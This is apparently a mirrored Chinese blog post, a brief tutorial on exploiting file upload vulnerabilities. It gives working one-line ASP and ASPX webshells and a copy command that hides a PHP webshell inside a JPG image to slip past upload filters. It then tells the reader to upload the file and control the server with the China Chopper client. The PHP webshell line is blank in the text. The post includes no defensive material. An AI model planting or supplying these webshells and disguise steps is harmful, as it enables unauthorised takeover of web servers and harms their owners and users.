zoukankan      html  css  js  c++  java
  • 文件上传漏洞

    概述

    利用文件上传漏洞,往目录站点上传一句话木马(简称webshell),再使用中国菜刀chopper.exe,即可提取系统权限。

    常见形式

    php的一句话木马:
    asp的一句话是: <%eval request ("pass")%>
    aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

    图片木马

    1. 需要将上传文件的文件头伪装成图片,首先利用copy命令将一句话木马文件Hack.php与正常的图片文件1.jpg合并,生成带有木马的图片文件hack.jpg.
      copy 1.jpg/b+Hack.php/a hack.jpg
      【备注】在CMD下用copy命令制作“图片木马”的步骤,其中,1.jpg/b中“b”表示“二进制文件”,Hack.php/a中“a"表示ASCII码文件。

    2. 上传带木马的图片文件

    3、使用中国菜刀

  • 相关阅读:
    前端工程师基础课程作业
    对于API接口设计的几点看法
    socket socket.io
    移动端布局
    angularJS
    bootstrop的应用
    jquery基础
    html5本地存储
    ajax
    数据库类型
  • 原文地址:https://www.cnblogs.com/yoyoyang/p/13390746.html
Copyright © 2011-2022 走看看